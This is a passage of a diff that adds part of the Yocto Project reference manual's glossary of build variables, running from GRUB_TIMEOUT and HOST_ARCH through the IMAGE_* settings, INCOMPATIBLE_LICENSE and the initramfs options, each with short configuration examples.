+ The ``GRUB_TIMEOUT`` variable is optional. See the
+ :ref:`grub-efi <ref-classes-grub-efi>` class for more information
+ on how this variable is used.
+
+ :term:`GTKIMMODULES_PACKAGES`
+ When inheriting the
+ :ref:`gtk-immodules-cache <ref-classes-gtk-immodules-cache>` class,
+ this variable specifies the packages that contain the GTK+ input
+ method modules being installed when the modules are in packages other
+ than the main package.
+
+ :term:`HOMEPAGE`
+ Website where more information about the software the recipe is
+ building can be found.
+
+ :term:`HOST_ARCH`
+ The name of the target architecture, which is normally the same as
+ :term:`TARGET_ARCH`. The OpenEmbedded build system
+ supports many architectures. Here is an example list of architectures
+ supported. This list is by no means complete as the architecture is
+ configurable:
+
+ - arm
+ - i586
+ - x86_64
+ - powerpc
+ - powerpc64
+ - mips
+ - mipsel
+
+ :term:`HOST_CC_ARCH`
+ Specifies architecture-specific compiler flags that are passed to the
+ C compiler.
+
+ Default initialization for ``HOST_CC_ARCH`` varies depending on what
+ is being built:
+
+ - :term:`TARGET_CC_ARCH` when building for the
+ target
+
+ - :term:`BUILD_CC_ARCH` when building for the build host (i.e.
+ ``-native``)
+
+ - ``BUILDSDK_CC_ARCH`` when building for an SDK (i.e.
+ ``nativesdk-``)
+
+ :term:`HOST_OS`
+ Specifies the name of the target operating system, which is normally
+ the same as the :term:`TARGET_OS`. The variable can
+ be set to "linux" for ``glibc``-based systems and to "linux-musl" for
+ ``musl``. For ARM/EABI targets, there are also "linux-gnueabi" and
+ "linux-musleabi" values possible.
+
+ :term:`HOST_PREFIX`
+ Specifies the prefix for the cross-compile toolchain. ``HOST_PREFIX``
+ is normally the same as :term:`TARGET_PREFIX`.
+
+ :term:`HOST_SYS`
+ Specifies the system, including the architecture and the operating
+ system, for which the build is occurring in the context of the
+ current recipe.
+
+ The OpenEmbedded build system automatically sets this variable based
+ on :term:`HOST_ARCH`,
+ :term:`HOST_VENDOR`, and
+ :term:`HOST_OS` variables.
+
+ .. note::
+
+ You do not need to set the variable yourself.
+
+ Consider these two examples:
+
+ - Given a native recipe on a 32-bit x86 machine running Linux, the
+ value is "i686-linux".
+
+ - Given a recipe being built for a little-endian MIPS target running
+ Linux, the value might be "mipsel-linux".
+
+ :term:`HOSTTOOLS`
+ A space-separated list (filter) of tools on the build host that
+ should be allowed to be called from within build tasks. Using this
+ filter helps reduce the possibility of host contamination. If a tool
+ specified in the value of ``HOSTTOOLS`` is not found on the build
+ host, the OpenEmbedded build system produces an error and the build
+ is not started.
+
+ For additional information, see
+ :term:`HOSTTOOLS_NONFATAL`.
+
+ :term:`HOSTTOOLS_NONFATAL`
+ A space-separated list (filter) of tools on the build host that
+ should be allowed to be called from within build tasks. Using this
+ filter helps reduce the possibility of host contamination. Unlike
+ :term:`HOSTTOOLS`, the OpenEmbedded build system
+ does not produce an error if a tool specified in the value of
+ ``HOSTTOOLS_NONFATAL`` is not found on the build host. Thus, you can
+ use ``HOSTTOOLS_NONFATAL`` to filter optional host tools.
+
+ :term:`HOST_VENDOR`
+ Specifies the name of the vendor. ``HOST_VENDOR`` is normally the
+ same as :term:`TARGET_VENDOR`.
+
+ :term:`ICECC_DISABLED`
+ Disables or enables the ``icecc`` (Icecream) function. For more
+ information on this function and best practices for using this
+ variable, see the ":ref:`icecc.bbclass <ref-classes-icecc>`"
+ section.
+
+ Setting this variable to "1" in your ``local.conf`` disables the
+ function:
+ ::
+
+ ICECC_DISABLED ??= "1"
+
+ To enable the function, set the variable as follows:
+ ::
+
+ ICECC_DISABLED = ""
+
+ :term:`ICECC_ENV_EXEC`
+ Points to the ``icecc-create-env`` script that you provide. This
+ variable is used by the :ref:`icecc <ref-classes-icecc>` class. You
+ set this variable in your ``local.conf`` file.
+
+ If you do not point to a script that you provide, the OpenEmbedded
+ build system uses the default script provided by the
+ ``icecc-create-env.bb`` recipe, which is a modified version and not
+ the one that comes with ``icecc``.
+
+ :term:`ICECC_PARALLEL_MAKE`
+ Extra options passed to the ``make`` command during the
+ :ref:`ref-tasks-compile` task that specify parallel
+ compilation. This variable usually takes the form of "-j x", where x
+ represents the maximum number of parallel threads ``make`` can run.
+
+ .. note::
+
+ The options passed affect builds on all enabled machines on the
+ network, which are machines running the ``iceccd`` daemon.
+
+ If your enabled machines support multiple cores, coming up with the
+ maximum number of parallel threads that gives you the best
+ performance could take some experimentation since machine speed,
+ network lag, available memory, and existing machine loads can all
+ affect build time. Consequently, unlike the
+ :term:`PARALLEL_MAKE` variable, there is no
+ rule-of-thumb for setting ``ICECC_PARALLEL_MAKE`` to achieve optimal
+ performance.
+
+ If you do not set ``ICECC_PARALLEL_MAKE``, the build system does not
+ use it (i.e. the system does not detect and assign the number of
+ cores as is done with ``PARALLEL_MAKE``).
+
+ :term:`ICECC_PATH`
+ The location of the ``icecc`` binary. You can set this variable in
+ your ``local.conf`` file. If your ``local.conf`` file does not define
+ this variable, the :ref:`icecc <ref-classes-icecc>` class attempts
+ to define it by locating ``icecc`` using ``which``.
+
+ :term:`ICECC_USER_CLASS_BL`
+ Identifies user classes that you do not want the Icecream distributed
+ compile support to consider. This variable is used by the
+ :ref:`icecc <ref-classes-icecc>` class. You set this variable in
+ your ``local.conf`` file.
+
+ When you list classes using this variable, you are "blacklisting"
+ them from distributed compilation across remote hosts. Any classes
+ you list will be distributed and compiled locally.
+
+ :term:`ICECC_USER_PACKAGE_BL`
+ Identifies user recipes that you do not want the Icecream distributed
+ compile support to consider. This variable is used by the
+ :ref:`icecc <ref-classes-icecc>` class. You set this variable in
+ your ``local.conf`` file.
+
+ When you list packages using this variable, you are "blacklisting"
+ them from distributed compilation across remote hosts. Any packages
+ you list will be distributed and compiled locally.
+
+ :term:`ICECC_USER_PACKAGE_WL`
+ Identifies user recipes that use an empty
+ :term:`PARALLEL_MAKE` variable that you want to
+ force remote distributed compilation on using the Icecream
+ distributed compile support. This variable is used by the
+ :ref:`icecc <ref-classes-icecc>` class. You set this variable in
+ your ``local.conf`` file.
+
+ :term:`IMAGE_BASENAME`
+ The base name of image output files. This variable defaults to the
+ recipe name (``${``\ :term:`PN`\ ``}``).
+
+ :term:`IMAGE_BOOT_FILES`
+ A space-separated list of files installed into the boot partition
+ when preparing an image using the Wic tool with the
+ ``bootimg-partition`` or ``bootimg-efi`` source plugin. By default,
+ the files are
+ installed under the same name as the source files. To change the
+ installed name, separate it from the original name with a semi-colon
+ (;). Source files need to be located in
+ :term:`DEPLOY_DIR_IMAGE`. Here are two
+ examples:
+ ::
+
+ IMAGE_BOOT_FILES = "u-boot.img uImage;kernel"
+ IMAGE_BOOT_FILES = "u-boot.${UBOOT_SUFFIX} ${KERNEL_IMAGETYPE}"
+
+ Alternatively, source files can be picked up using a glob pattern. In
+ this case, the destination file must have the same name as the base
+ name of the source file path. To install files into a directory
+ within the target location, pass its name after a semi-colon (;).
+ Here are two examples:
+ ::
+
+ IMAGE_BOOT_FILES = "bcm2835-bootfiles/*"
+ IMAGE_BOOT_FILES = "bcm2835-bootfiles/*;boot/"
+
+ The first example
+ installs all files from ``${DEPLOY_DIR_IMAGE}/bcm2835-bootfiles``
+ into the root of the target partition. The second example installs
+ the same files into a ``boot`` directory within the target partition.
+
+ You can find information on how to use the Wic tool in the
+ ":ref:`dev-manual/dev-manual-common-tasks:creating partitioned images using wic`"
+ section of the Yocto Project Development Tasks Manual. Reference
+ material for Wic is located in the
+ ":doc:`../ref-manual/ref-kickstart`" chapter.
+
+ :term:`IMAGE_CLASSES`
+ A list of classes that all images should inherit. You typically use
+ this variable to specify the list of classes that register the
+ different types of images the OpenEmbedded build system creates.
+
+ The default value for ``IMAGE_CLASSES`` is ``image_types``. You can
+ set this variable in your ``local.conf`` or in a distribution
+ configuration file.
+
+ For more information, see ``meta/classes/image_types.bbclass`` in the
+ :term:`Source Directory`.
+
+ :term:`IMAGE_CMD`
+ Specifies the command to create the image file for a specific image
+ type, which corresponds to the value set set in
+ :term:`IMAGE_FSTYPES`, (e.g. ``ext3``,
+ ``btrfs``, and so forth). When setting this variable, you should use
+ an override for the associated type. Here is an example:
+ ::
+
+ IMAGE_CMD_jffs2 = "mkfs.jffs2 --root=${IMAGE_ROOTFS} \
+ --faketime --output=${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}.rootfs.jffs2 \
+ ${EXTRA_IMAGECMD}"
+
+ You typically do not need to set this variable unless you are adding
+ support for a new image type. For more examples on how to set this
+ variable, see the :ref:`image_types <ref-classes-image_types>`
+ class file, which is ``meta/classes/image_types.bbclass``.
+
+ :term:`IMAGE_DEVICE_TABLES`
+ Specifies one or more files that contain custom device tables that
+ are passed to the ``makedevs`` command as part of creating an image.
+ These files list basic device nodes that should be created under
+ ``/dev`` within the image. If ``IMAGE_DEVICE_TABLES`` is not set,
+ ``files/device_table-minimal.txt`` is used, which is located by
+ :term:`BBPATH`. For details on how you should write
+ device table files, see ``meta/files/device_table-minimal.txt`` as an
+ example.
+
+ :term:`IMAGE_FEATURES`
+ The primary list of features to include in an image. Typically, you
+ configure this variable in an image recipe. Although you can use this
+ variable from your ``local.conf`` file, which is found in the
+ :term:`Build Directory`, best practices dictate that you do
+ not.
+
+ .. note::
+
+ To enable extra features from outside the image recipe, use the
+ :term:`EXTRA_IMAGE_FEATURES` variable.
+
+ For a list of image features that ships with the Yocto Project, see
+ the ":ref:`ref-features-image`" section.
+
+ For an example that shows how to customize your image by using this
+ variable, see the ":ref:`usingpoky-extend-customimage-imagefeatures`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`IMAGE_FSTYPES`
+ Specifies the formats the OpenEmbedded build system uses during the
+ build when creating the root filesystem. For example, setting
+ ``IMAGE_FSTYPES`` as follows causes the build system to create root
+ filesystems using two formats: ``.ext3`` and ``.tar.bz2``:
+ ::
+
+ IMAGE_FSTYPES = "ext3 tar.bz2"
+
+ For the complete list of supported image formats from which you can
+ choose, see :term:`IMAGE_TYPES`.
+
+ .. note::
+
+ - If an image recipe uses the "inherit image" line and you are
+ setting ``IMAGE_FSTYPES`` inside the recipe, you must set
+ ``IMAGE_FSTYPES`` prior to using the "inherit image" line.
+
+ - Due to the way the OpenEmbedded build system processes this
+ variable, you cannot update its contents by using ``_append``
+ or ``_prepend``. You must use the ``+=`` operator to add one or
+ more options to the ``IMAGE_FSTYPES`` variable.
+
+ :term:`IMAGE_INSTALL`
+ Used by recipes to specify the packages to install into an image
+ through the :ref:`image <ref-classes-image>` class. Use the
+ ``IMAGE_INSTALL`` variable with care to avoid ordering issues.
+
+ Image recipes set ``IMAGE_INSTALL`` to specify the packages to
+ install into an image through ``image.bbclass``. Additionally,
+ "helper" classes such as the
+ :ref:`core-image <ref-classes-core-image>` class exist that can
+ take lists used with ``IMAGE_FEATURES`` and turn them into
+ auto-generated entries in ``IMAGE_INSTALL`` in addition to its
+ default contents.
+
+ When you use this variable, it is best to use it as follows:
+ ::
+
+ IMAGE_INSTALL_append = " package-name"
+
+ Be sure to include the space
+ between the quotation character and the start of the package name or
+ names.
+
+ .. note::
+
+ - When working with a
+ :ref:`core-image-minimal-initramfs <ref-manual/ref-images:images>`
+ image, do not use the ``IMAGE_INSTALL`` variable to specify
+ packages for installation. Instead, use the
+ :term:`PACKAGE_INSTALL` variable, which
+ allows the initial RAM filesystem (initramfs) recipe to use a
+ fixed set of packages and not be affected by ``IMAGE_INSTALL``.
+ For information on creating an initramfs, see the
+ ":ref:`building-an-initramfs-image`"
+ section in the Yocto Project Development Tasks Manual.
+
+ - Using ``IMAGE_INSTALL`` with the
+ :ref:`+= <bitbake:appending-and-prepending>`
+ BitBake operator within the ``/conf/local.conf`` file or from
+ within an image recipe is not recommended. Use of this operator
+ in these ways can cause ordering issues. Since
+ ``core-image.bbclass`` sets ``IMAGE_INSTALL`` to a default
+ value using the
+ :ref:`?= <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:setting a default value (?=)>`
+ operator, using a ``+=`` operation against ``IMAGE_INSTALL``
+ results in unexpected behavior when used within
+ ``conf/local.conf``. Furthermore, the same operation from
+ within an image recipe may or may not succeed depending on the
+ specific situation. In both these cases, the behavior is
+ contrary to how most users expect the ``+=`` operator to work.
+
+ :term:`IMAGE_LINGUAS`
+ Specifies the list of locales to install into the image during the
+ root filesystem construction process. The OpenEmbedded build system
+ automatically splits locale files, which are used for localization,
+ into separate packages. Setting the ``IMAGE_LINGUAS`` variable
+ ensures that any locale packages that correspond to packages already
+ selected for installation into the image are also installed. Here is
+ an example:
+ ::
+
+ IMAGE_LINGUAS = "pt-br de-de"
+
+ In this example, the build system ensures any Brazilian Portuguese
+ and German locale files that correspond to packages in the image are
+ installed (i.e. ``*-locale-pt-br`` and ``*-locale-de-de`` as well as
+ ``*-locale-pt`` and ``*-locale-de``, since some software packages
+ only provide locale files by language and not by country-specific
+ language).
+
+ See the :term:`GLIBC_GENERATE_LOCALES`
+ variable for information on generating GLIBC locales.
+
+
+ :term:`IMAGE_LINK_NAME`
+ The name of the output image symlink (which does not include
+ the version part as :term:`IMAGE_NAME` does). The default value
+ is derived using the :term:`IMAGE_BASENAME` and :term:`MACHINE`
+ variables:
+ ::
+
+ IMAGE_LINK_NAME ?= "${IMAGE_BASENAME}-${MACHINE}"
+
+
+ :term:`IMAGE_MANIFEST`
+ The manifest file for the image. This file lists all the installed
+ packages that make up the image. The file contains package
+ information on a line-per-package basis as follows:
+ ::
+
+ packagename packagearch version
+
+ The :ref:`image <ref-classes-image>` class defines the manifest
+ file as follows:
+ ::
+
+ IMAGE_MANIFEST ="${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}.rootfs.manifest"
+
+ The location is
+ derived using the :term:`DEPLOY_DIR_IMAGE`
+ and :term:`IMAGE_NAME` variables. You can find
+ information on how the image is created in the ":ref:`image-generation-dev-environment`"
+ section in the Yocto Project Overview and Concepts Manual.
+
+ :term:`IMAGE_NAME`
+ The name of the output image files minus the extension. This variable
+ is derived using the :term:`IMAGE_BASENAME`,
+ :term:`MACHINE`, and :term:`IMAGE_VERSION_SUFFIX`
+ variables:
+ ::
+
+ IMAGE_NAME ?= "${IMAGE_BASENAME}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+ :term:`IMAGE_NAME_SUFFIX`
+ Suffix used for the image output file name - defaults to ``".rootfs"``
+ to distinguish the image file from other files created during image
+ building; however if this suffix is redundant or not desired you can
+ clear the value of this variable (set the value to ""). For example,
+ this is typically cleared in initramfs image recipes.
+
+ :term:`IMAGE_OVERHEAD_FACTOR`
+ Defines a multiplier that the build system applies to the initial
+ image size for cases when the multiplier times the returned disk
+ usage value for the image is greater than the sum of
+ ``IMAGE_ROOTFS_SIZE`` and ``IMAGE_ROOTFS_EXTRA_SPACE``. The result of
+ the multiplier applied to the initial image size creates free disk
+ space in the image as overhead. By default, the build process uses a
+ multiplier of 1.3 for this variable. This default value results in
+ 30% free disk space added to the image when this method is used to
+ determine the final generated image size. You should be aware that
+ post install scripts and the package management system uses disk
+ space inside this overhead area. Consequently, the multiplier does
+ not produce an image with all the theoretical free disk space. See
+ ``IMAGE_ROOTFS_SIZE`` for information on how the build system
+ determines the overall image size.
+
+ The default 30% free disk space typically gives the image enough room
+ to boot and allows for basic post installs while still leaving a
+ small amount of free disk space. If 30% free space is inadequate, you
+ can increase the default value. For example, the following setting
+ gives you 50% free space added to the image:
+ ::
+
+ IMAGE_OVERHEAD_FACTOR = "1.5"
+
+ Alternatively, you can ensure a specific amount of free disk space is
+ added to the image by using the ``IMAGE_ROOTFS_EXTRA_SPACE``
+ variable.
+
+ :term:`IMAGE_PKGTYPE`
+ Defines the package type (i.e. DEB, RPM, IPK, or TAR) used by the
+ OpenEmbedded build system. The variable is defined appropriately by
+ the :ref:`package_deb <ref-classes-package_deb>`,
+ :ref:`package_rpm <ref-classes-package_rpm>`,
+ :ref:`package_ipk <ref-classes-package_ipk>`, or
+ :ref:`package_tar <ref-classes-package_tar>` class.
+
+ .. note::
+
+ The ``package_tar`` class is broken and is not supported. It is
+ recommended that you do not use it.
+
+ The :ref:`populate_sdk_* <ref-classes-populate-sdk-*>` and
+ :ref:`image <ref-classes-image>` classes use the ``IMAGE_PKGTYPE``
+ for packaging up images and SDKs.
+
+ You should not set the ``IMAGE_PKGTYPE`` manually. Rather, the
+ variable is set indirectly through the appropriate
+ :ref:`package_* <ref-classes-package>` class using the
+ :term:`PACKAGE_CLASSES` variable. The
+ OpenEmbedded build system uses the first package type (e.g. DEB, RPM,
+ or IPK) that appears with the variable
+
+ .. note::
+
+ Files using the ``.tar`` format are never used as a substitute
+ packaging format for DEB, RPM, and IPK formatted files for your image
+ or SDK.
+
+ :term:`IMAGE_POSTPROCESS_COMMAND`
+ Specifies a list of functions to call once the OpenEmbedded build
+ system creates the final image output files. You can specify
+ functions separated by semicolons:
+ ::
+
+ IMAGE_POSTPROCESS_COMMAND += "function; ... "
+
+ If you need to pass the root filesystem path to a command within the
+ function, you can use ``${IMAGE_ROOTFS}``, which points to the
+ directory that becomes the root filesystem image. See the
+ :term:`IMAGE_ROOTFS` variable for more
+ information.
+
+ :term:`IMAGE_PREPROCESS_COMMAND`
+ Specifies a list of functions to call before the OpenEmbedded build
+ system creates the final image output files. You can specify
+ functions separated by semicolons:
+ ::
+
+ IMAGE_PREPROCESS_COMMAND += "function; ... "
+
+ If you need to pass the root filesystem path to a command within the
+ function, you can use ``${IMAGE_ROOTFS}``, which points to the
+ directory that becomes the root filesystem image. See the
+ :term:`IMAGE_ROOTFS` variable for more
+ information.
+
+ :term:`IMAGE_ROOTFS`
+ The location of the root filesystem while it is under construction
+ (i.e. during the :ref:`ref-tasks-rootfs` task). This
+ variable is not configurable. Do not change it.
+
+ :term:`IMAGE_ROOTFS_ALIGNMENT`
+ Specifies the alignment for the output image file in Kbytes. If the
+ size of the image is not a multiple of this value, then the size is
+ rounded up to the nearest multiple of the value. The default value is
+ "1". See :term:`IMAGE_ROOTFS_SIZE` for
+ additional information.
+
+ :term:`IMAGE_ROOTFS_EXTRA_SPACE`
+ Defines additional free disk space created in the image in Kbytes. By
+ default, this variable is set to "0". This free disk space is added
+ to the image after the build system determines the image size as
+ described in ``IMAGE_ROOTFS_SIZE``.
+
+ This variable is particularly useful when you want to ensure that a
+ specific amount of free disk space is available on a device after an
+ image is installed and running. For example, to be sure 5 Gbytes of
+ free disk space is available, set the variable as follows:
+ ::
+
+ IMAGE_ROOTFS_EXTRA_SPACE = "5242880"
+
+ For example, the Yocto Project Build Appliance specifically requests
+ 40 Gbytes of extra space with the line:
+ ::
+
+ IMAGE_ROOTFS_EXTRA_SPACE = "41943040"
+
+ :term:`IMAGE_ROOTFS_SIZE`
+ Defines the size in Kbytes for the generated image. The OpenEmbedded
+ build system determines the final size for the generated image using
+ an algorithm that takes into account the initial disk space used for
+ the generated image, a requested size for the image, and requested
+ additional free disk space to be added to the image. Programatically,
+ the build system determines the final size of the generated image as
+ follows:
+ ::
+
+ if (image-du * overhead) < rootfs-size:
+ internal-rootfs-size = rootfs-size + xspace
+ else:
+ internal-rootfs-size = (image-du * overhead) + xspace
+ where:
+ image-du = Returned value of the du command on the image.
+ overhead = IMAGE_OVERHEAD_FACTOR
+ rootfs-size = IMAGE_ROOTFS_SIZE
+ internal-rootfs-size = Initial root filesystem size before any modifications.
+ xspace = IMAGE_ROOTFS_EXTRA_SPACE
+
+ See the :term:`IMAGE_OVERHEAD_FACTOR`
+ and :term:`IMAGE_ROOTFS_EXTRA_SPACE`
+ variables for related information.
+
+ :term:`IMAGE_TYPEDEP`
+ Specifies a dependency from one image type on another. Here is an
+ example from the :ref:`image-live <ref-classes-image-live>` class:
+ ::
+
+ IMAGE_TYPEDEP_live = "ext3"
+
+ In the previous example, the variable ensures that when "live" is
+ listed with the :term:`IMAGE_FSTYPES` variable,
+ the OpenEmbedded build system produces an ``ext3`` image first since
+ one of the components of the live image is an ``ext3`` formatted
+ partition containing the root filesystem.
+
+ :term:`IMAGE_TYPES`
+ Specifies the complete list of supported image types by default:
+
+ - btrfs
+ - container
+ - cpio
+ - cpio.gz
+ - cpio.lz4
+ - cpio.lzma
+ - cpio.xz
+ - cramfs
+ - ext2
+ - ext2.bz2
+ - ext2.gz
+ - ext2.lzma
+ - ext3
+ - ext3.gz
+ - ext4
+ - ext4.gz
+ - f2fs
+ - hddimg
+ - iso
+ - jffs2
+ - jffs2.sum
+ - multiubi
+ - squashfs
+ - squashfs-lz4
+ - squashfs-lzo
+ - squashfs-xz
+ - tar
+ - tar.bz2
+ - tar.gz
+ - tar.lz4
+ - tar.xz
+ - tar.zst
+ - ubi
+ - ubifs
+ - wic
+ - wic.bz2
+ - wic.gz
+ - wic.lzma
+
+ For more information about these types of images, see
+ ``meta/classes/image_types*.bbclass`` in the :term:`Source Directory`.
+
+ :term:`IMAGE_VERSION_SUFFIX`
+ Version suffix that is part of the default :term:`IMAGE_NAME` and
+ :term:`KERNEL_ARTIFACT_NAME` values.
+ Defaults to ``"-${DATETIME}"``, however you could set this to a
+ version string that comes from your external build environment if
+ desired, and this suffix would then be used consistently across
+ the build artifacts.
+
+ :term:`INC_PR`
+ Helps define the recipe revision for recipes that share a common
+ ``include`` file. You can think of this variable as part of the
+ recipe revision as set from within an include file.
+
+ Suppose, for example, you have a set of recipes that are used across
+ several projects. And, within each of those recipes the revision (its
+ :term:`PR` value) is set accordingly. In this case, when
+ the revision of those recipes changes, the burden is on you to find
+ all those recipes and be sure that they get changed to reflect the
+ updated version of the recipe. In this scenario, it can get
+ complicated when recipes that are used in many places and provide
+ common functionality are upgraded to a new revision.
+
+ A more efficient way of dealing with this situation is to set the
+ ``INC_PR`` variable inside the ``include`` files that the recipes
+ share and then expand the ``INC_PR`` variable within the recipes to
+ help define the recipe revision.
+
+ The following provides an example that shows how to use the
+ ``INC_PR`` variable given a common ``include`` file that defines the
+ variable. Once the variable is defined in the ``include`` file, you
+ can use the variable to set the ``PR`` values in each recipe. You
+ will notice that when you set a recipe's ``PR`` you can provide more
+ granular revisioning by appending values to the ``INC_PR`` variable:
+ ::
+
+ recipes-graphics/xorg-font/xorg-font-common.inc:INC_PR = "r2"
+ recipes-graphics/xorg-font/encodings_1.0.4.bb:PR = "${INC_PR}.1"
+ recipes-graphics/xorg-font/font-util_1.3.0.bb:PR = "${INC_PR}.0"
+ recipes-graphics/xorg-font/font-alias_1.0.3.bb:PR = "${INC_PR}.3"
+
+ The
+ first line of the example establishes the baseline revision to be
+ used for all recipes that use the ``include`` file. The remaining
+ lines in the example are from individual recipes and show how the
+ ``PR`` value is set.
+
+ :term:`INCOMPATIBLE_LICENSE`
+ Specifies a space-separated list of license names (as they would
+ appear in :term:`LICENSE`) that should be excluded
+ from the build (if set globally), or from an image (if set locally
+ in an image recipe).
+
+ When the variable is set globally, recipes that provide no alternatives to listed
+ incompatible licenses are not built. Packages that are individually
+ licensed with the specified incompatible licenses will be deleted.
+ Most of the time this does not allow a feasible build (because it becomes impossible
+ to satisfy build time dependencies), so the recommended way to
+ implement license restrictions is to set the variable in specific
+ image recipes where the restrictions must apply. That way there
+ are no build time restrictions, but the license check is still
+ performed when the image's filesystem is assembled from packages.
+
+ .. note::
+
+ This functionality is only regularly tested using the following
+ setting:
+ ::
+
+ INCOMPATIBLE_LICENSE = "GPL-3.0 LGPL-3.0 AGPL-3.0"
+
+
+ Although you can use other settings, you might be required to
+ remove dependencies on or provide alternatives to components that
+ are required to produce a functional system image.
+
+ .. note::
+
+ It is possible to define a list of licenses that are allowed to be
+ used instead of the licenses that are excluded. To do this, define
+ a variable ``COMPATIBLE_LICENSES`` with the names of the licences
+ that are allowed. Then define ``INCOMPATIBLE_LICENSE`` as:
+ ::
+
+ INCOMPATIBLE_LICENSE = "${@' '.join(sorted(set(d.getVar('AVAILABLE_LICENSES').split()) - set(d.getVar('COMPATIBLE_LICENSES').split())))}"
+
+
+ This will result in ``INCOMPATIBLE_LICENSE`` containing the names of
+ all licences from :term:`AVAILABLE_LICENSES` except the ones specified
+ in ``COMPATIBLE_LICENSES`` , thus only allowing the latter licences to
+ be used.
+
+ :term:`INHERIT`
+ Causes the named class or classes to be inherited globally. Anonymous
+ functions in the class or classes are not executed for the base
+ configuration and in each individual recipe. The OpenEmbedded build
+ system ignores changes to ``INHERIT`` in individual recipes.
+
+ For more information on ``INHERIT``, see the
+ :ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:\`\`inherit\`\` configuration directive`"
+ section in the Bitbake User Manual.
+
+ :term:`INHERIT_DISTRO`
+ Lists classes that will be inherited at the distribution level. It is
+ unlikely that you want to edit this variable.
+
+ The default value of the variable is set as follows in the
+ ``meta/conf/distro/defaultsetup.conf`` file:
+ ::
+
+ INHERIT_DISTRO ?= "debian devshell sstate license"
+
+ :term:`INHIBIT_DEFAULT_DEPS`
+ Prevents the default dependencies, namely the C compiler and standard
+ C library (libc), from being added to :term:`DEPENDS`.
+ This variable is usually used within recipes that do not require any
+ compilation using the C compiler.
+
+ Set the variable to "1" to prevent the default dependencies from
+ being added.
+
+ :term:`INHIBIT_PACKAGE_DEBUG_SPLIT`
+ Prevents the OpenEmbedded build system from splitting out debug
+ information during packaging. By default, the build system splits out
+ debugging information during the
+ :ref:`ref-tasks-package` task. For more information on
+ how debug information is split out, see the
+ :term:`PACKAGE_DEBUG_SPLIT_STYLE`
+ variable.
+
+ To prevent the build system from splitting out debug information
+ during packaging, set the ``INHIBIT_PACKAGE_DEBUG_SPLIT`` variable as
+ follows:
+ ::
+
+ INHIBIT_PACKAGE_DEBUG_SPLIT = "1"
+
+ :term:`INHIBIT_PACKAGE_STRIP`
+ If set to "1", causes the build to not strip binaries in resulting
+ packages and prevents the ``-dbg`` package from containing the source
+ files.
+
+ By default, the OpenEmbedded build system strips binaries and puts
+ the debugging symbols into ``${``\ :term:`PN`\ ``}-dbg``.
+ Consequently, you should not set ``INHIBIT_PACKAGE_STRIP`` when you
+ plan to debug in general.
+
+ :term:`INHIBIT_SYSROOT_STRIP`
+ If set to "1", causes the build to not strip binaries in the
+ resulting sysroot.
+
+ By default, the OpenEmbedded build system strips binaries in the
+ resulting sysroot. When you specifically set the
+ ``INHIBIT_SYSROOT_STRIP`` variable to "1" in your recipe, you inhibit
+ this stripping.
+
+ If you want to use this variable, include the
+ :ref:`staging <ref-classes-staging>` class. This class uses a
+ ``sys_strip()`` function to test for the variable and acts
+ accordingly.
+
+ .. note::
+
+ Use of the ``INHIBIT_SYSROOT_STRIP`` variable occurs in rare and
+ special circumstances. For example, suppose you are building
+ bare-metal firmware by using an external GCC toolchain. Furthermore,
+ even if the toolchain's binaries are strippable, other files exist
+ that are needed for the build that are not strippable.
+
+ :term:`INITRAMFS_FSTYPES`
+ Defines the format for the output image of an initial RAM filesystem
+ (initramfs), which is used during boot. Supported formats are the
+ same as those supported by the
+ :term:`IMAGE_FSTYPES` variable.
+
+ The default value of this variable, which is set in the
+ ``meta/conf/bitbake.conf`` configuration file in the
+ :term:`Source Directory`, is "cpio.gz". The Linux kernel's
+ initramfs mechanism, as opposed to the initial RAM filesystem
+ `initrd <https://en.wikipedia.org/wiki/Initrd>`__ mechanism, expects
+ an optionally compressed cpio archive.
+
+ :term:`INITRAMFS_IMAGE`
+ Specifies the :term:`PROVIDES` name of an image
+ recipe that is used to build an initial RAM filesystem (initramfs)
+ image. In other words, the ``INITRAMFS_IMAGE`` variable causes an
+ additional recipe to be built as a dependency to whatever root
+ filesystem recipe you might be using (e.g. ``core-image-sato``). The
+ initramfs image recipe you provide should set
+ :term:`IMAGE_FSTYPES` to
+ :term:`INITRAMFS_FSTYPES`.
+
+ An initramfs image provides a temporary root filesystem used for
+ early system initialization (e.g. loading of modules needed to locate
+ and mount the "real" root filesystem).
+
+ .. note::
+
+ See the ``meta/recipes-core/images/core-image-minimal-initramfs.bb``
+ recipe in the :term:`Source Directory`
+ for an example initramfs recipe. To select this sample recipe as
+ the one built to provide the initramfs image, set ``INITRAMFS_IMAGE``
+ to "core-image-minimal-initramfs".
+
+ You can also find more information by referencing the
+ ``meta-poky/conf/local.conf.sample.extended`` configuration file in
+ the Source Directory, the :ref:`image <ref-classes-image>` class,
+ and the :ref:`kernel <ref-classes-kernel>` class to see how to use
+ the ``INITRAMFS_IMAGE`` variable.
+
+ If ``INITRAMFS_IMAGE`` is empty, which is the default, then no
+ initramfs image is built.
+
+ For more information, you can also see the
+ :term:`INITRAMFS_IMAGE_BUNDLE`
+ variable, which allows the generated image to be bundled inside the
+ kernel image. Additionally, for information on creating an initramfs
+ image, see the ":ref:`building-an-initramfs-image`" section
+ in the Yocto Project Development Tasks Manual.
+
+ :term:`INITRAMFS_IMAGE_BUNDLE`
+ Controls whether or not the image recipe specified by
+ :term:`INITRAMFS_IMAGE` is run through an
+ extra pass
+ (:ref:`ref-tasks-bundle_initramfs`) during
+ kernel compilation in order to build a single binary that contains
+ both the kernel image and the initial RAM filesystem (initramfs)
+ image. This makes use of the
+ :term:`CONFIG_INITRAMFS_SOURCE` kernel
+ feature.
+
+ .. note::
+
+ Using an extra compilation pass to bundle the initramfs avoids a
+ circular dependency between the kernel recipe and the initramfs
+ recipe should the initramfs include kernel modules. Should that be
+ the case, the initramfs recipe depends on the kernel for the
+ kernel modules, and the kernel depends on the initramfs recipe
+ since the initramfs is bundled inside the kernel image.
+
+ The combined binary is deposited into the ``tmp/deploy`` directory,
+ which is part of the :term:`Build Directory`.
+
+ Setting the variable to "1" in a configuration file causes the
+ OpenEmbedded build system to generate a kernel image with the
+ initramfs specified in ``INITRAMFS_IMAGE`` bundled within:
+ ::
+
+ INITRAMFS_IMAGE_BUNDLE = "1"
+
+ By default, the
+ :ref:`kernel <ref-classes-kernel>` class sets this variable to a
+ null string as follows:
+ ::
+
+ INITRAMFS_IMAGE_BUNDLE ?= ""
+
+ .. note::
+
